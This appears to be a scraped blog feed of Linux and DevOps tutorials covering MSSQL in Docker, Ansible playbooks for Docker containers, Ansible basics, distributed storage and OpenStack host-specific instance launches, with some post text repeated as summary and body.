logs of your container using <code>docker logs</code> command</p> <pre><code>~# docker logs mymssql This is an evaluation version. There are [174] days left in the evaluation period. 2016-12-21 12:56:24.72 Server Microsoft SQL Server vNext (CTP1.1) - 14.0.100.187 (X64) Dec 10 2016 02:51:11 Copyright (C) 2016 Microsoft Corporation. All rights reserved. on Linux (CentOS Linux 7 (Core)) ... ... ... ... ... 2016-12-21 12:56:27.26 spid6s Polybase feature disabled. 2016-12-21 12:56:27.26 spid6s Clearing tempdb database. 2016-12-21 12:56:27.85 spid6s Starting up database 'tempdb'. 2016-12-21 12:56:28.14 spid6s The tempdb database has 1 data file(s). 2016-12-21 12:56:28.15 spid20s The Service Broker endpoint is in disabled or stopped state. 2016-12-21 12:56:28.16 spid20s The Database Mirroring endpoint is in disabled or stopped state. 2016-12-21 12:56:28.18 spid20s Service Broker manager has started. 2016-12-21 12:56:28.26 spid5s Recovery is complete. This is an informational message only. No user action is required. 
</code></pre> <p>Looks like its up and running.</p> <p><strong>Now Test it</strong></p> <p>Use SQL Server tools on Linux to connect to MSSQL server.</p> <p>on RHEL or CentOS</p> <pre><code>~# wget https://packages.microsoft.com/config/rhel/7/prod.repo -O /etc/yum.repos.d/msprod.repo ~# yum install mssql-tools </code></pre> <p>on Ubuntu</p> <pre><code>~# curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - ~# wget https://packages.microsoft.com/config/ubuntu/16.04/prod.list -O /etc/apt/sources.list.d/msprod.list ~# apt-get update ~# apt-get install mssql-tools </code></pre> <p><strong>Query SQL Server</strong></p> <p>This Docker Image was created with SA password as <code>'RedHat123'</code>. You can change it later on.</p> <pre><code>[root@centos ~]# sqlcmd -S localhost -U SA -P 'RedHat123' 1&gt; SELECT Name from sys.Databases; 2&gt; GO Name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb (4 rows affected) 1&gt; </code></pre> <p>Create Database</p> <pre><code>1&gt; CREATE DATABASE test; 2&gt; GO </code></pre> <p>Use Database test</p> <pre><code>1&gt; USE test; 2&gt; GO Changed database context to 'test'. 1&gt; </code></pre> <p>Create Table </p> <pre><code>1&gt; CREATE TABLE student (id INT, name NVARCHAR(50), rollno INT); 2&gt; GO 1&gt; </code></pre> <p>Insert Some Data</p> <pre><code>1&gt; INSERT INTO student VALUES (1, 'joey', 1123); 2&gt; INSERT INTO student VALUES (2, 'phoebe', 1154); 3&gt; GO (1 rows affected) (1 rows affected) 1&gt; </code></pre> <p>Finally get it back</p> <pre><code>1&gt; SELECT * FROM student; 2&gt; GO id name rollno ----------- -------------------------------------------------- ----------- 1 joey 1123 2 phoebe 1154 (2 rows affected) 1&gt; </code></pre> <p><strong>Other tools that run on Windows to connect to this SQL Server Docker container:</strong></p> <ul> <li>SQL Server Management Studio (SSMS)</li> <li>Windows PowerShell</li> <li>SQL Server Data Tools (SSDT)</li> </ul> <p><strong><em>Thats it for now, Enjoy :)</em></strong></p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Creating Docker Container using Ansible<p><img src="http://www.googlinux.com/content/images/2016/12/ansible_docker_blog.png" alt=""> <strong><em>Ansible and Docker have acquired a larger share among DevOps products &amp; tools. So how about creating a generic ansible playbook to deploy a docker container.</em></strong></p> <blockquote> <p>If you are new to Ansible, I would recommend you to go through <a href="http://googlinux.com/ansible-getting-started/">Ansible: Getting Started</a>. </p> </blockquote> <p>We start our playbook by giving it a</p>http://www.googlinux.com/creating-docker-container-using-ansible/43f3cbc2-60b9-4a59-b014-6a0ae14d6b26DevOpsAnsibleDockerSwapnil JainSun, 18 Dec 2016 14:50:27 GMT<p><img src="http://www.googlinux.com/content/images/2016/12/ansible_docker_blog.png" alt=""> <strong><em>Ansible and Docker have acquired a larger share among DevOps products &amp; tools. So how about creating a generic ansible playbook to deploy a docker container.</em></strong></p> <blockquote> <p>If you are new to Ansible, I would recommend you to go through <a href="http://googlinux.com/ansible-getting-started/">Ansible: Getting Started</a>. </p> </blockquote> <p>We start our playbook by giving it a name <code>Create Docker Container</code>. 
<h1>Creating Docker Container using Ansible</h1>
<p><em>Swapnil Jain · DevOps, Ansible, Docker · Sun, 18 Dec 2016</em></p>
<p><img src="http://www.googlinux.com/content/images/2016/12/ansible_docker_blog.png" alt=""></p>
<p><strong><em>Ansible and Docker have acquired a large share among DevOps products &amp; tools. So how about creating a generic Ansible playbook to deploy a Docker container?</em></strong></p>
<blockquote>
<p>If you are new to Ansible, I would recommend you go through <a href="http://googlinux.com/ansible-getting-started/">Ansible: Getting Started</a>.</p>
</blockquote>
<p>We start our playbook by giving it a name, <code>Create Docker Container</code>. This playbook will be executed on host <code>localhost</code> with connection type <code>local</code>, using user root. Make changes as per your needs.</p>
<pre><code>---
- name: Create Docker Container
  hosts: localhost
  connection: local
  remote_user: root
</code></pre>
<p>On to our tasks. The first one is to include our variables, which makes this playbook more generic.</p>
<pre><code>  tasks:
    - name: include variables
      include_vars: vars.yml
</code></pre>
<p>Let's have a look at the <code>vars.yml</code> file:</p>
<pre><code>image: swapnillinux/apache-php
name: myweb
src_port: 8080
dest_port: 80
src_vol: /mnt/www
dest_vol: /var/www/html
privileged: true
</code></pre>
<p>In this example I am creating a Docker container with the following properties, and to make the playbook generic I have defined them as variables in the vars.yml file. Suit yourself; make changes as per your needs.</p>
<ul>
<li>The <code>swapnillinux/apache-php</code> Docker image will be used, which is based on CentOS + Apache 2 + PHP 5 + mod_ssl.</li>
<li>The name of the container will be <code>myweb</code>.</li>
<li>Port <code>8080</code> on the host running the container will be forwarded to port <code>80</code> of the container.</li>
<li>The folder <code>/mnt/www</code> on the host will be mapped to <code>/var/www/html</code> in the container. This makes your web root persistent.</li>
</ul>
<p>The next tasks install python-docker, to support the Docker modules available with Ansible 2.2:</p>
<pre><code>    - name: Install python-docker on Red Hat based distributions
      yum:
        name: python-docker
        enablerepo: extras
        state: latest
      when: ansible_os_family == 'RedHat'

    - name: Install python-docker on Debian based distributions
      apt:
        name: python-docker
        update_cache: yes
      when: ansible_os_family == 'Debian'
</code></pre>
<p>I am using the <code>docker_container</code> module to create the container, using the variables defined in the <code>vars.yml</code> file:</p>
<pre><code>    - name: Create Container
      docker_container:
        name: "{{ name }}"
        image: "{{ image }}"
        ports:
          - "{{ src_port }}:{{ dest_port }}"
        volumes:
          - "{{ src_vol }}:{{ dest_vol }}"
        privileged: "{{ privileged }}"
</code></pre>
<p>There's a lot more that can be done with the <code>docker_container</code> module. Have a look at some great examples by running the command below:</p>
<pre><code>ansible-doc docker_container
</code></pre>
<p>That's not all. How about creating a systemd service and starting our container at system boot? For this I have used Jinja2 templates.</p>
<p>This is the Jinja2 systemd unit file template:
</p> <pre><code># cat systemd.j2 [Unit] Description={{ name }} Docker Container Requires=docker.service After=docker.service [Service] Restart=always ExecStart=/usr/bin/docker start -a {{ name }} ExecStop=/usr/bin/docker stop -t 2 {{ name }} [Install] WantedBy=default.target </code></pre> <p>We use <code>template</code> module in ansible to create this unit file using the name variable defined in <code>vars.yml</code></p> <pre><code> - name: Create Systemd Unit File as docker-{{ name }}.service template: src=systemd.j2 dest=/etc/systemd/system/docker-{{ name }}.service - name: reload systemd daemon command: systemctl daemon-reload </code></pre> <p>Next task will enable this service and start it, which should also start our container.</p> <pre><code> - name: Start &amp; Enable docker-{{ name }} service service: name: docker-{{ name }} state: started enabled: yes </code></pre> <p>And finally print the <code>docker ps</code> output</p> <pre><code> - name: check container status command: docker ps register: result - debug: var=result.stdout </code></pre> <blockquote> <p>Ansible playbooks are created in yaml which are very sensitive to spaces and indentation. Copy paste in this blog might have destroyed that. So I have made all files available on GitHub at <a href="https://github.com/swapnil-linux/ansible/tree/master/create-docker-container">https://github.com/swapnil-linux/ansible/tree/master/create-docker-container</a> </p> </blockquote> <p>now lets execute this</p> <p><img src="http://www.googlinux.com/content/images/2016/12/Screenshot-2016-12-18-20-17-03.png" alt=""></p> <p>Thats it for now. Enjoy ansibling :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Ansible: Getting Started<h3 id="whatisansible">What is Ansible?</h3> <p>Ansible was originally written by Michael DeHaan in Python with its first release on February 20, 2012. It was later acquired by Red Hat. Ansible is an open source configuration management and orchestration utility. It helps to automate deployment or softwares and configurations of multiple remote hosts.</p>http://www.googlinux.com/ansible-getting-started/f68c66cd-eb76-403c-863b-a65fea9d7341AnsibleDevOpsSwapnil JainTue, 04 Oct 2016 17:40:42 GMT<h3 id="whatisansible">What is Ansible?</h3> <img src="http://www.googlinux.com/content/images/2016/10/marshmellow.jpg" alt="Ansible: Getting Started"><p>Ansible was originally written by Michael DeHaan in Python with its first release on February 20, 2012. It was later acquired by Red Hat. Ansible is an open source configuration management and orchestration utility. It helps to automate deployment or softwares and configurations of multiple remote hosts. Instead of writing custom, unmanaged, long and individual bash scripts, system administrators can write playbooks in Ansible. Ansible is also supported by DevOps tools, such as Vagrant and Jenkins.</p> <ul> <li><code>Playbook</code> is a YAML (<strong>Y</strong>AML <strong>A</strong>in't <strong>M</strong>arkup <strong>L</strong>anguage) file which consists a list of <code>Plays</code>. 
</li> <li>A <code>Play</code> in a playbook is a list of <code>Tasks</code>.</li> <li>A <code>Task</code> in a play contains <code>Modules</code> and its arguments.</li> <li>Where as <code>Module</code> are the ones that do the actual work in ansible.</li> </ul> <h3 id="howansibleworks">How Ansible Works?</h3> <p>The greatest benefit of Ansible that I see is, unlike Puppet it is agent less. The only requirement on remote host (know as <mark>Managed Host</mark>) is Python 2.4 or later. If you are running less than Python 2.5 on the remotes, you will also need <code>python-simplejson.</code> Ansible is installed on a central host (know as <mark>Control Host</mark>) where Playbooks are created. Playbooks are pushed to Managed Host thru SSH as a Python code and executed locally on Managed Host.</p> <h3 id="installingansible">Installing Ansible</h3> <p>Ansible needs to be installed on control node. As of now control node is not supported on Windows. It is available via Yum(Red Hat), Apt (Debian), Portage (Gentoo), pkg (FreeBSD), OpenCSW (Solaris), Pacman (Arch Linux), Pip and can be installed from Source as well. Python 2.6 or 2.7 is required on Control Node. Python3 not yet supported just like many other Python apps :).</p> <h4 id="redhatbaseddistributions">Red Hat based Distributions</h4> <p>Ansible on Red Hat based distributions like RHEL, CentOS, Fedora is available through EPEL repo.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-21-35-39.png" alt="Ansible: Getting Started"></p> <h4 id="debianbaseddistributions">Debian Based Distributions</h4> <pre><code>[root@debian ~]# apt-get update [root@debian ~]# apt-get install -y ansible </code></pre> <h3 id="testingyourinstallation">Testing Your Installation</h3> <pre><code>[root@centos ~]# ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# ansible localhost -m ping --connection=local localhost | SUCCESS =&gt; { "changed": false, "ping": "pong" } [root@centos ~]# </code></pre> <p><code>ansible --version</code> displays the ansible version and the ansible configuration file its referring to. <code>ansible localhost -m ping --connection=local</code> will run a ansible module <code>ping</code> on <code>localhost</code> using connection as <code>local</code> instead of <code>ssh</code> which is default. Receiving a <code>SUCCESS</code> and a <code>"pong"</code> in reply says that ansible was able to connect to localhost successfully. We will discuss more about modules later.</p> <h3 id="ansibleconfiguration">Ansible Configuration</h3> <p>Default ansible configuration file is located as <code>/etc/ansible/ansible.cfg</code>. If ansible finds a <code>.ansible.cfg</code> in users home directory, options in that config file will override the one in default config file.</p> <pre><code>[root@centos ~]# ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# touch ~/.ansible.cfg [root@centos ~]# ansible --version ansible 2.1.1.0 config file = /root/.ansible.cfg configured module search path = Default w/o overrides [root@centos ~]# </code></pre> <p>If ansible finds <code>ansible.cfg</code> file in your current working directory, option within that file will take precedence over the above two. Below example shows that. 
</p> <pre><code>[root@centos ~]# mkdir Test [root@centos ~]# cd Test [root@centos Test]# touch ansible.cfg [root@centos Test]# ansible --version ansible 2.1.1.0 config file = /root/Test/ansible.cfg configured module search path = Default w/o overrides [root@centos Test]# </code></pre> <p>Or, if you have your config file at some other location and want ansible to point to it, <code>$ANSIBLE_CONFIG</code> bash environment variable will help you do that. And that takes precedence over all others.</p> <pre><code>[root@centos Test]# touch /var/tmp/myansible.cfg [root@centos Test]# export ANSIBLE_CONFIG=/var/tmp/myansible.cfg [root@centos Test]# ansible --version ansible 2.1.1.0 config file = /var/tmp/myansible.cfg configured module search path = Default w/o overrides [root@centos Test]# </code></pre> <h3 id="inventory">Inventory</h3> <p>If Ansible modules are the tools in your workshop, playbooks are your instruction manuals, and your <strong>inventory</strong> of hosts are your raw material.</p> <p>Ansible’s inventory file is a list of your managed hosts. It can contain hostnames, ipaddresses, hostpaterns using regular expressions. It also contains groups of hosts and group of groups. Default inventory location is <code>/etc/ansible/hosts</code>. You can specify a different inventory file using the <code>-i &lt;path&gt;</code> option on the command line. Inventory file can also contain host and group variables which can later be used in playbooks.</p> <h3 id="modules">Modules</h3> <p>Ansible ships with a hundreds of modules that can be executed directly on remote hosts using ad-hoc commands or through Playbooks.</p> <p>You can also write your own modules. These modules can control system resources, like services, packages, or files (almost anything that you would like to manage), or handle executing system commands.</p> <p><code>ansible-doc -l</code> would give you a list of all modules with a short description piped to less.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-31-24.png" alt="Ansible: Getting Started"></p> <p><code>ansible-doc &lt;module_name&gt;</code> will show detailed information about the usage of module, including snippets and some examples which can be used in playbooks and ad-hoc commands.</p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-33-03.png" alt="Ansible: Getting Started"></p> <h3 id="runningadhoccommands">Running Ad-Hoc Commands</h3> <p>True power of Ansible lies in playbooks. Why would you use ad-hoc tasks versus playbooks? Ad-hoc command is a quick way executing your modules on remote hosts without saving them for later use. 
<h3 id="modules">Modules</h3>
<p>Ansible ships with hundreds of modules that can be executed directly on remote hosts using ad-hoc commands, or through playbooks.</p>
<p>You can also write your own modules. These modules can control system resources, like services, packages, or files (almost anything that you would like to manage), or handle executing system commands.</p>
<p><code>ansible-doc -l</code> will give you a list of all modules with a short description, piped to less.</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-31-24.png" alt="Ansible: Getting Started"></p>
<p><code>ansible-doc &lt;module_name&gt;</code> will show detailed information about the usage of a module, including snippets and some examples which can be used in playbooks and ad-hoc commands.</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-22-33-03.png" alt="Ansible: Getting Started"></p>
<h3 id="runningadhoccommands">Running Ad-Hoc Commands</h3>
<p>The true power of Ansible lies in playbooks. So why would you use ad-hoc tasks instead of playbooks? An ad-hoc command is a quick way of executing your modules on remote hosts without saving them for later use; for example, when you want to power off all, or a group of, servers for the weekend.</p>
<p><code>ansible &lt;HOST-PATTERN&gt; -m &lt;MODULE_NAME&gt; -a &lt;MODULE_ARGS&gt;</code></p>
<pre><code>[root@centos ~]# ansible all -m command -a "/usr/sbin/poweroff" -i myinventory
</code></pre>
<p>Some more examples will help you understand the power of ad-hoc commands.</p>
<p><strong>Execute the <code>hostname</code> command on all hosts in your inventory:</strong></p>
<pre><code>[root@centos ~]# ansible all -m command -a hostname
localhost | SUCCESS | rc=0 &gt;&gt;
centos

192.168.56.1 | SUCCESS | rc=0 &gt;&gt;
Swapnils-MacBook-Pro.local
</code></pre>
<p><strong>Using the yum module, install the latest version of Docker on the host named centos; if it is already installed, make sure it is the latest:</strong></p>
<pre><code>[root@centos ~]# ansible centos -m yum -a 'name=docker state=latest'
centos | SUCCESS =&gt; {
    "changed": false,
    "msg": "",
    "rc": 0,
    "results": [
        "All packages providing docker are up to date",
        ""
    ]
}
</code></pre>
<p><strong>Using the service module, start the docker service and also enable it to start at system boot:</strong></p>
<pre><code>[root@centos ~]# ansible centos -m service -a 'name=docker state=started enabled=yes'
centos | SUCCESS =&gt; {
    "changed": true,
    "enabled": true,
    "name": "docker",
    "state": "started"
}
</code></pre>
<h3 id="letsputitinaplaybook">Let's put it in a Playbook</h3>
<p>We use these modules to create two tasks in a play, so our playbook looks like the screenshot below (a text reconstruction appears at the end of this post).</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-23-03-27.png" alt="Ansible: Getting Started"></p>
<h5 id="letsexecuteit">Let's execute it.</h5>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-04-23-06-02.png" alt="Ansible: Getting Started"></p>
<blockquote>
<p><strong><em>Please note</em></strong>, <em>Ansible playbooks are written as YAML, and YAML is very sensitive to spaces and indentation. Do not use tabs. Putting the lines below in your <code>~/.vimrc</code> will help.</em></p>
</blockquote>
<pre><code>set nu
set ai
set softtabstop=2
set expandtab
</code></pre>
<p>That's it for now. Next, I will go deeper into playbooks. Till then, enjoy ansibling :)</p>
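<p>As promised above, here is a plain-text version of the playbook from the screenshot. It is a reconstruction from the two ad-hoc commands shown earlier, so treat the file name and exact layout as approximate:</p>
<pre><code>[root@centos ~]# cat docker.yml
---
- name: Install and start docker
  hosts: centos
  tasks:
    - name: install latest docker
      yum:
        name: docker
        state: latest

    - name: start and enable docker service
      service:
        name: docker
        state: started
        enabled: yes

[root@centos ~]# ansible-playbook docker.yml
</code></pre>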
<h1>Understanding Distributed Data Storage</h1>
<p><em>Daleep Singh Bais · Ceph, Gluster · Mon, 03 Oct 2016</em></p>
<p><em>With the advent of the 21st century we entered a digital world. People have started using technology in every aspect of life, adopting it more and more to make life easier and save time. With this increased use, the demand to store and preserve user data has also increased manifold. You use cameras to take pics, and to treasure those memories you upload them to web-enabled storage like Picasa. Just imagine: Picasa has about 7 billion photos uploaded to it, which is a little more than Flickr, less than Photobucket, and just a tiny fraction of Facebook. This figure might help you to imagine the kind of data store these companies might be using.</em></p>
<p><img src="http://www.googlinux.com/content/images/2016/10/2011-dropboxetc.jpeg" alt=""></p>
<p>With data requirements such as these, local storage solutions will not be able to keep pace with the continuous increase in demand. We can say that we have reached the stage at which the traditional way of storing data, using stand-alone network attached devices, no longer serves the purpose.</p>
<p>As per a report published by IDC: "This is the digital universe. It is growing 40% a year into the next decade, expanding to include not only the increasing number of people and enterprises doing everything online, but also all the “things” – smart devices – connected to the Internet, unleashing a new wave of opportunities for businesses and people around the world. Like the physical universe, the digital universe is large – by 2020 containing nearly as many digital bits as there are stars in the universe. It is doubling in size every two years, and by 2020 the digital universe – the data we create and copy annually – will reach 44 zettabytes, or 44 trillion gigabytes."</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/du-stacks-to-moon.jpg" alt=""></p>
<p>The answer to this doesn't lie in having faster, bigger drives or higher-bandwidth data networks; it lies in a new concept of storing data, which is Distributed Data Storage.</p>
<p>Data storage solutions have now evolved to accommodate this ever-growing need for a flexible and scalable storage resource.</p>
<h2 id="sowhatisdistributeddatastorage">So what is Distributed Data Storage?</h2>
<p>To quote <strong><em>Wikipedia</em></strong>: "A distributed data store is a computer network where information is stored on more than one node, often in a replicated fashion. It is usually specifically used to refer to either a distributed database where users store information on a number of nodes, or a computer network in which users store information on a number of peer network nodes."</p>
<p>Using Distributed Data Storage, you can deliver any of the 3 types of storage, be it block, file or object.</p>
<h3 id="howisdistributeddatastoragedifferentfromtraditionalwayofstoringdata">How is Distributed Data Storage different from the traditional way of storing data?</h3>
<p>Understanding the difference between these two ways of storing data lies in getting to know the salient features of, and approach to, each solution.</p>
<p>Traditional storage is mostly hardware-defined and dependent on traditional SAN &amp; NAS storage systems, whereas Distributed Data Storage has given a new meaning to Software Defined Storage.</p>
<h4 id="cost">Cost</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/cost-reduction-projects1-e1371369693372.jpg" alt=""></p>
<p>For the very reason that traditional storage is hardware-defined, cost plays a major role in making the decision. With a traditional SAN &amp; NAS storage array, you shell out a huge amount to procure and deploy the hardware, whereas with SDS you can simply start the storage cluster using commodity off-the-shelf hardware: standard servers, drives and networks. You don't need any specialized hardware for deploying Distributed Data Storage. With Distributed Data Storage, you can minimize the cost of the infrastructure, which can be significant considering the continuous growth in storage demand. It combines storage and compute, making full use of the servers
while consuming less power, cooling, space, etc.</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-11-47-31.png" alt=""></p>
<p>Nowadays, such storage solutions are also available on ARM platforms, making them useful for storage solutions. <a href="http://ambedded.com.tw">Ambedded Technology</a>, winner of InterOp 2016, is the first company to have pioneered in this direction.</p>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-28-18.png" alt=""></p>
<h4 id="scalablecapacityperformance">Scalable (capacity &amp; performance)</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/scal3.png" alt=""></p>
<p>A traditional SAN / NAS can only be scaled up to a limit: the maximum number of controllers it can support, or the maximum number of drives one can connect to each controller. This defines the real limit of these devices, whereas with SDS / Distributed Data Storage there is virtually no limit to expanding capacity. It is, by design, a cloud: you keep adding new nodes and your cluster keeps growing. Maintenance is also comparatively easy, as you can add a new node to the cluster and remove a faulty one.</p>
<h4 id="flexibility">Flexibility</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/boing-e8e8e81.png" alt=""></p>
<p>You can add and remove nodes from the data storage cluster on the fly. You don't need any downtime for maintenance with this solution. Managing it is also easy: you can mostly manage it using CLI commands, or use REST APIs.</p>
<h4 id="reliabilityresilience">Reliability / Resilience</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/reliable.jpg" alt=""></p>
<p>Most distributed storage solutions take care of fault tolerance by design. They also have the capability to replicate the stored data for any unforeseen event. Due to the distributed nature, data is not stored on a single node; it is distributed among the various nodes of the cluster, and each piece is further replicated, depending on the number of replicas defined by the cluster admin. Almost all of them also have data sanity checks, so that the stored data is also checked for any corruption.</p>
<p>In distributed data storage, it is the function of the Software Defined Storage system to ensure that everything is divided, distributed, replicated and, in case of any issue, rectified with intelligent algorithms created by the admins.</p>
<h4 id="opensourcenovendorlockin">Open Source, No Vendor Lock-in</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-48-01.png" alt=""></p>
<p>With hardware NAS / SAN devices, you mostly need to go ahead with the existing deployed solution and buy the same hardware every time you wish to increase the storage capacity. As distributed storage systems, or for that matter Software Defined Storage systems, are deployed and installed on commodity hardware, we are not bound to any particular hardware or server vendor.</p>
<h4 id="multitenancy">Multi-tenancy</h4>
<p><img src="http://www.googlinux.com/content/images/2016/10/multitenancy.jpg" alt=""></p>
<p>Software defined storage solutions are designed keeping cloud workloads in mind; hence, multi-tenant support is built in.
<h4 id="opensourcenovendorlockin">OpenSource, No Vendor Lock-in -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-48-01.png" alt=""></p> <p>With hardware NAS / SAN devices, you mostly need to stick with the solution already deployed and buy the same hardware every time you wish to increase the storage capacity. As distributed storage systems, or for that matter Software Defined Storage systems, are deployed / installed on commodity hardware, we are not bound to any particular hardware or server vendor.</p> <h4 id="multitenancy">Multi-tenancy -</h4> <p><img src="http://www.googlinux.com/content/images/2016/10/multitenancy.jpg" alt=""></p> <p>Software Defined Storage solutions are designed with cloud workloads in mind, hence multi-tenant support is built in. They provide the ability to isolate different tenants' data and restrict access.</p> <h2 id="factsandfigures">Facts and figures</h2> <p><img src="http://www.googlinux.com/content/images/2016/10/xagxksez.jpeg" alt=""></p> <p>The global cloud storage market is expected to grow from USD 18.87 billion in 2015 to USD 65.41 billion by 2020, at a Compound Annual Growth Rate (CAGR) of 28.2% during the forecast period.</p> <p>The demand for this market is also being driven by big data and the increasing adoption of cloud storage gateways. In 2015, North America was estimated to be the top contributor to the cloud storage market, due to greater technological acceptance and high awareness of emerging data storage concerns among organizations. However, APAC and some countries in MEA are expected to show tremendous growth in this market.</p> <p>The cloud storage market is broadly segmented by type: solutions and services; by solution: primary storage solution, backup storage solution, cloud storage gateway solution, and data movement and access solution; by service: consulting services, system and networking integration, and support, training, and education; by deployment model: public, private, and hybrid; by organization size: SMBs and large enterprises; by vertical: BFSI, manufacturing, retail and consumer goods, telecommunication and IT, media and entertainment, government, healthcare and life sciences, energy and utilities, research and education, and others; and by region: North America, Europe, APAC, Latin America, and MEA.</p> <p>Cloud storage growth dominates projections for 2016 digital storage. According to Scality’s Jerome Lecat, “By the end of 2016, 80% of SMBs will host some or most of their business in the cloud. Because of this, the service providers that provide the cloud-services to such businesses will need new infrastructure to meet the increasing demand, and support its customers.”</p> <p>According to Mario Blandini from SwiftStack, “Ubiquitous access with cloud APIs for all unstructured data will represent the lion’s share of unstructured data stored. Optimal storage solutions will be those that can store and return the same data based on authentication rules no matter the access method. In via file, out via object, or vice versa.”</p> <blockquote> <p>Ceph, Swift, and Gluster are some of the well-known Software Defined Storage solutions for building a fantastic distributed data storage setup.</p> </blockquote> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-from-2016-09-02-12-55-04.png" alt=""></p> <p><img src="http://www.googlinux.com/content/images/2016/10/Screenshot-2016-10-03-18-37-59.png" alt=""></p> <p><strong>This brings us to the end of this post; I hope it has helped you understand the difference between traditional storage and distributed data storage design.</strong></p> <hr> <p><em><mark>Like it? 
<a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>OpenStack: Launching an instance on a specific compute host<p><strong><em>OpenStack takes care of Instance scheduling automatically for us depending on flavour selected during Nova instance boot, however, many times, we might need to populate the instance on a specific hypervisor / Nova compute node.</em></strong></p> <p>To achieve this we need to specify the compute node at the stage, you select Flavour,</p>http://www.googlinux.com/openstack-launching-an-instance-on-a-specific-compute-host/5fcf00bf-c4e3-4e9f-8154-5bcb513df035OpenStackCloud ComputingDaleep Singh BaisFri, 02 Sep 2016 02:42:47 GMT<img src="http://www.googlinux.com/content/images/2016/09/fiwaremexicoworkshop.jpg" alt="OpenStack: Launching an instance on a specific compute host"><p><strong><em>OpenStack takes care of Instance scheduling automatically for us depending on flavour selected during Nova instance boot, however, many times, we might need to populate the instance on a specific hypervisor / Nova compute node.</em></strong></p> <p>To achieve this we need to specify the compute node at the stage, you select Flavour, Image etc.</p> <h6 id="firststepwouldbetofindoutthenovaavailabilityzone">First step would be to find out the nova availability-zone.</h6> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-41-15.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <h6 id="nextlistthehypervisorsinyouropenstackcluster">Next, List the hypervisors in your OpenStack cluster.</h6> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-45-09.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p><mark>For example</mark>, we wish to launch an Instance, specifically to host <code>server-osp2.example.com.</code></p> <p>Source to the user managing the particular tenant and run command -</p> <pre><code># nova boot --nic net-id=8df4cd26-9fb2-445a-a0ed-f5f7ffce5ade --flavor m1.tiny --image web Web-inst-osp2 --availability-zone nova:server-osp2.example.com </code></pre> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-47-58.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <blockquote> <p>Option <code>–availability-zone</code> takes nova availability zone along with Compute hostname on which the instance is to be populated.</p> </blockquote> <p>In this case, as we are trying with a non-admin user and so we get error message. This is a privileged operation by default and is allowed only by admin user. This prevents OpenStack users from hosting a compute host by scheduling all of their resources there. 
<p><mark>For example</mark>, we wish to launch an instance specifically on the host <code>server-osp2.example.com</code>.</p> <p>Source the RC file of the user managing the particular tenant and run the command -</p> <pre><code># nova boot --nic net-id=8df4cd26-9fb2-445a-a0ed-f5f7ffce5ade --flavor m1.tiny --image web Web-inst-osp2 --availability-zone nova:server-osp2.example.com
</code></pre> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-47-58.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <blockquote> <p>The <code>--availability-zone</code> option takes the nova availability zone along with the hostname of the compute node on which the instance is to be placed.</p> </blockquote> <p>In this case, as we are trying with a non-admin user, we get an error message. This is a privileged operation by default and is allowed only for the admin user, which prevents OpenStack users from monopolizing a compute host by scheduling all of their instances there.</p> <p>If this command still needs to be run as a regular user, we need to edit the Nova policy which imposes this restriction.</p> <p>Edit the <code>/etc/nova/policy.json</code> file and change</p> <pre><code>"compute:create:forced_host": "is_admin:True",
</code></pre> <p>to</p> <pre><code>"compute:create:forced_host": "",
</code></pre> <p>and restart the OpenStack Nova services (it is the Nova API service that enforces this policy).</p> <p>Now you should be able to run the command successfully and see the instance up and running.</p> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-52-31.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p>Run the below-mentioned command to check on which hypervisor / compute node the instance is running:</p> <pre><code># nova hypervisor-servers server-osp2.example.com
